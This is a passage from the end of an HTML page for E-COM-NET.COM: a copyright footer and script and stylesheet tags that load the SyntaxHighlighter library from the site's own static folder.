2000-2050 E-COM-NET.COM , All Rights Reserved.  </div> </div> </footer>  <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>